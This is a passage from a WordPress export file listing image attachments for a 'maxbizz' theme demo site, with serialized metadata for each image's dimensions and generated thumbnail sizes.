		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1420;s:6:"height";i:1630;s:4:"file";s:20:"2020/09/project2.jpg";s:5:"sizes";a:15:{s:6:"medium";a:4:{s:4:"file";s:20:"project2-261x300.jpg";s:5:"width";i:261;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:21:"project2-892x1024.jpg";s:5:"width";i:892;s:6:"height";i:1024;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:20:"project2-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:20:"project2-768x882.jpg";s:5:"width";i:768;s:6:"height";i:882;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:22:"project2-1338x1536.jpg";s:5:"width";i:1338;s:6:"height";i:1536;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:20:"project2-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:20:"project2-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:21:"project2-1200x600.jpg";s:5:"width";i:1200;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:22:"project2-1200x1200.jpg";s:5:"width";i:1200;s:6:"height";i:1200;s:9:"mime-type";s:10:"image/jpeg";}s:21:"woocommerce_thumbnail";a:5:{s:4:"file";s:20:"project2-300x344.jpg";s:5:"width";i:300;s:6:"height";i:344;s:9:"mime-type";s:10:"image/jpeg";s:9:"uncropped";b:1;}s:18:"woocommerce_single";a:4:{s:4:"file";s:20:"project2-600x689.jpg";s:5:"width";i:600;s:6:"height";i:689;s:9:"mime-type";s:10:"image/jpeg";}s:29:"woocommerce_gallery_thumbnail";a:4:{s:4:"file";s:20:"project2-100x100.jpg";s:5:"width";i:100;s:6:"height";i:100;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:20:"project2-300x344.jpg";s:5:"width";i:300;s:6:"height";i:344;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:20:"project2-600x689.jpg";s:5:"width";i:600;s:6:"height";i:689;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:20:"project2-100x100.jpg";s:5:"width";i:100;s:6:"height";i:100;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg3-home1</title>
		<link>http://wpdemo.archiwp.com/maxbizz/home/bg3-home1/</link>
		<pubDate>Fri, 02 Oct 2020 09:46:22 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg3-home1.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1233</wp:post_id>
		<wp:post_date><![CDATA[2020-10-02 09:46:22]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-02 09:46:22]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg3-home1]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg3-home1.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/10/bg3-home1.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:200;s:4:"file";s:21:"2020/10/bg3-home1.jpg";s:5:"sizes";a:15:{s:6:"medium";a:4:{s:4:"file";s:20:"bg3-home1-300x31.jpg";s:5:"width";i:300;s:6:"height";i:31;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:22:"bg3-home1-1024x107.jpg";s:5:"width";i:1024;s:6:"height";i:107;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:21:"bg3-home1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:20:"bg3-home1-768x80.jpg";s:5:"width";i:768;s:6:"height";i:80;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:22:"bg3-home1-1536x160.jpg";s:5:"width";i:1536;s:6:"height";i:160;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:21:"bg3-home1-600x200.jpg";s:5:"width";i:600;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:21:"bg3-home1-600x200.jpg";s:5:"width";i:600;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:22:"bg3-home1-1200x200.jpg";s:5:"width";i:1200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:22:"bg3-home1-1200x200.jpg";s:5:"width";i:1200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:21:"woocommerce_thumbnail";a:5:{s:4:"file";s:20:"bg3-home1-300x31.jpg";s:5:"width";i:300;s:6:"height";i:31;s:9:"mime-type";s:10:"image/jpeg";s:9:"uncropped";b:1;}s:18:"woocommerce_single";a:4:{s:4:"file";s:20:"bg3-home1-600x63.jpg";s:5:"width";i:600;s:6:"height";i:63;s:9:"mime-type";s:10:"image/jpeg";}s:29:"woocommerce_gallery_thumbnail";a:4:{s:4:"file";s:21:"bg3-home1-100x100.jpg";s:5:"width";i:100;s:6:"height";i:100;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:20:"bg3-home1-300x31.jpg";s:5:"width";i:300;s:6:"height";i:31;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:20:"bg3-home1-600x63.jpg";s:5:"width";i:600;s:6:"height";i:63;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:21:"bg3-home1-100x100.jpg";s:5:"width";i:100;s:6:"height";i:100;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>fservice-3</title>
		<link>http://wpdemo.archiwp.com/maxbizz/home/fservice-3/</link>
		<pubDate>Mon, 05 Oct 2020 04:12:36 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/fservice-3.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1244</wp:post_id>
		<wp:post_date><![CDATA[2020-10-05 04:12:36]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-05 04:12:36]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[fservice-3]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/fservice-3.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/10/fservice-3.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:745;s:4:"file";s:22:"2020/10/fservice-3.jpg";s:5:"sizes";a:15:{s:6:"medium";a:4:{s:4:"file";s:22:"fservice-3-300x116.jpg";s:5:"width";i:300;s:6:"height";i:116;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:23:"fservice-3-1024x397.jpg";s:5:"width";i:1024;s:6:"height";i:397;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:22:"fservice-3-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:22:"fservice-3-768x298.jpg";s:5:"width";i:768;s:6:"height";i:298;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:23:"fservice-3-1536x596.jpg";s:5:"width";i:1536;s:6:"height";i:596;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:22:"fservice-3-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:22:"fservice-3-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:23:"fservice-3-1200x600.jpg";s:5:"width";i:1200;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:23:"fservice-3-1200x745.jpg";s:5:"width";i:1200;s:6:"height";i:745;s:9:"mime-type";s:10:"image/jpeg";}s:21:"woocommerce_thumbnail";a:5:{s:4:"file";s:22:"fservice-3-300x116.jpg";s:5:"width";i:300;s:6:"height";i:116;s:9:"mime-type";s:10:"image/jpeg";s:9:"uncropped";b:1;}s:18:"woocommerce_single";a:4:{s:4:"file";s:22:"fservice-3-600x233.jpg";s:5:"width";i:600;s:6:"height";i:233;s:9:"mime-type";s:10:"image/jpeg";}s:29:"woocommerce_gallery_thumbnail";a:4:{s:4:"file";s:22:"fservice-3-100x100.jpg";s:5:"width";i:100;s:6:"height";i:100;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:22:"fservice-3-300x116.jpg";s:5:"width";i:300;s:6:"height";i:116;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:22:"fservice-3-600x233.jpg";s:5:"width";i:600;s:6:"height";i:233;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:22:"fservice-3-100x100.jpg";s:5:"width";i:100;s:6:"height";i:100;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>slider1-home2</title>
		<link>http://wpdemo.archiwp.com/maxbizz/slider1-home2/</link>
		<pubDate>Thu, 15 Oct 2020 08:40:56 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/slider1-home2.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1307</wp:post_id>
		<wp:post_date><![CDATA[2020-10-15 08:40:56]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-15 08:40:56]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[slider1-home2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/slider1-home2.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/10/slider1-home2.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:781;s:4:"file";s:25:"2020/10/slider1-home2.jpg";s:5:"sizes";a:15:{s:6:"medium";a:4:{s:4:"file";s:25:"slider1-home2-300x122.jpg";s:5:"width";i:300;s:6:"height";i:122;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:26:"slider1-home2-1024x417.jpg";s:5:"width";i:1024;s:6:"height";i:417;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:25:"slider1-home2-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:25:"slider1-home2-768x312.jpg";s:5:"width";i:768;s:6:"height";i:312;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:26:"slider1-home2-1536x625.jpg";s:5:"width";i:1536;s:6:"height";i:625;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:25:"slider1-home2-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:25:"slider1-home2-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:26:"slider1-home2-1200x600.jpg";s:5:"width";i:1200;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:26:"slider1-home2-1200x781.jpg";s:5:"width";i:1200;s:6:"height";i:781;s:9:"mime-type";s:10:"image/jpeg";}s:21:"woocommerce_thumbnail";a:5:{s:4:"file";s:25:"slider1-home2-300x122.jpg";s:5:"width";i:300;s:6:"height";i:122;s:9:"mime-type";s:10:"image/jpeg";s:9:"uncropped";b:1;}s:18:"woocommerce_single";a:4:{s:4:"file";s:25:"slider1-home2-600x244.jpg";s:5:"width";i:600;s:6:"height";i:244;s:9:"mime-type";s:10:"image/jpeg";}s:29:"woocommerce_gallery_thumbnail";a:4:{s:4:"file";s:25:"slider1-home2-100x100.jpg";s:5:"width";i:100;s:6:"height";i:100;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:25:"slider1-home2-300x122.jpg";s:5:"width";i:300;s:6:"height";i:122;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:25:"slider1-home2-600x244.jpg";s:5:"width";i:600;s:6:"height";i:244;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:25:"slider1-home2-100x100.jpg";s:5:"width";i:100;s:6:"height";i:100;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>slider2-home2</title>
		<link>http://wpdemo.archiwp.com/maxbizz/slider2-home2/</link>
		<pubDate>Fri, 16 Oct 2020 08:22:00 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/slider2-home2.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1317</wp:post_id>
		<wp:post_date><![CDATA[2020-10-16 08:22:00]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-16 08:22:00]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[slider2-home2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/slider2-home2.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/10/slider2-home2.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:781;s:4:"file";s:25:"2020/10/slider2-home2.jpg";s:5:"sizes";a:15:{s:6:"medium";a:4:{s:4:"file";s:25:"slider2-home2-300x122.jpg";s:5:"width";i:300;s:6:"height";i:122;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:26:"slider2-home2-1024x417.jpg";s:5:"width";i:1024;s:6:"height";i:417;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:25:"slider2-home2-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:25:"slider2-home2-768x312.jpg";s:5:"width";i:768;s:6:"height";i:312;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:26:"slider2-home2-1536x625.jpg";s:5:"width";i:1536;s:6:"height";i:625;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:25:"slider2-home2-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:25:"slider2-home2-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:26:"slider2-home2-1200x600.jpg";s:5:"width";i:1200;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:26:"slider2-home2-1200x781.jpg";s:5:"width";i:1200;s:6:"height";i:781;s:9:"mime-type";s:10:"image/jpeg";}s:21:"woocommerce_thumbnail";a:5:{s:4:"file";s:25:"slider2-home2-300x122.jpg";s:5:"width";i:300;s:6:"height";i:122;s:9:"mime-type";s:10:"image/jpeg";s:9:"uncropped";b:1;}s:18:"woocommerce_single";a:4:{s:4:"file";s:25:"slider2-home2-600x244.jpg";s:5:"width";i:600;s:6:"height";i:244;s:9:"mime-type";s:10:"image/jpeg";}s:29:"woocommerce_gallery_thumbnail";a:4:{s:4:"file";s:25:"slider2-home2-100x100.jpg";s:5:"width";i:100;s:6:"height";i:100;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:25:"slider2-home2-300x122.jpg";s:5:"width";i:300;s:6:"height";i:122;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:25:"slider2-home2-600x244.jpg";s:5:"width";i:600;s:6:"height";i:244;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:25:"slider2-home2-100x100.jpg";s:5:"width";i:100;s:6:"height";i:100;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>slider3-home2</title>
		<link>http://wpdemo.archiwp.com/maxbizz/slider3-home2/</link>
		<pubDate>Fri, 16 Oct 2020 08:27:16 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/slider3-home2.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1318</wp:post_id>
		<wp:post_date><![CDATA[2020-10-16 08:27:16]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-16 08:27:16]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[slider3-home2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/slider3-home2.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/10/slider3-home2.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:781;s:4:"file";s:25:"2020/10/slider3-home2.jpg";s:5:"sizes";a:15:{s:6:"medium";a:4:{s:4:"file";s:25:"slider3-home2-300x122.jpg";s:5:"width";i:300;s:6:"height";i:122;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:26:"slider3-home2-1024x417.jpg";s:5:"width";i:1024;s:6:"height";i:417;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:25:"slider3-home2-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:25:"slider3-home2-768x312.jpg";s:5:"width";i:768;s:6:"height";i:312;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:26:"slider3-home2-1536x625.jpg";s:5:"width";i:1536;s:6:"height";i:625;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:25:"slider3-home2-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:25:"slider3-home2-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:26:"slider3-home2-1200x600.jpg";s:5:"width";i:1200;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:26:"slider3-home2-1200x781.jpg";s:5:"width";i:1200;s:6:"height";i:781;s:9:"mime-type";s:10:"image/jpeg";}s:21:"woocommerce_thumbnail";a:5:{s:4:"file";s:25:"slider3-home2-300x122.jpg";s:5:"width";i:300;s:6:"height";i:122;s:9:"mime-type";s:10:"image/jpeg";s:9:"uncropped";b:1;}s:18:"woocommerce_single";a:4:{s:4:"file";s:25:"slider3-home2-600x244.jpg";s:5:"width";i:600;s:6:"height";i:244;s:9:"mime-type";s:10:"image/jpeg";}s:29:"woocommerce_gallery_thumbnail";a:4:{s:4:"file";s:25:"slider3-home2-100x100.jpg";s:5:"width";i:100;s:6:"height";i:100;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:25:"slider3-home2-300x122.jpg";s:5:"width";i:300;s:6:"height";i:122;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:25:"slider3-home2-600x244.jpg";s:5:"width";i:600;s:6:"height";i:244;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:25:"slider3-home2-100x100.jpg";s:5:"width";i:100;s:6:"height";i:100;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>profit</title>
		<link>http://wpdemo.archiwp.com/maxbizz/home/profit/</link>
		<pubDate>Mon, 07 Dec 2020 08:50:47 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/profit.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1403</wp:post_id>
		<wp:post_date><![CDATA[2020-12-07 08:50:47]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-07 08:50:47]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[profit]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/profit.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/profit.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
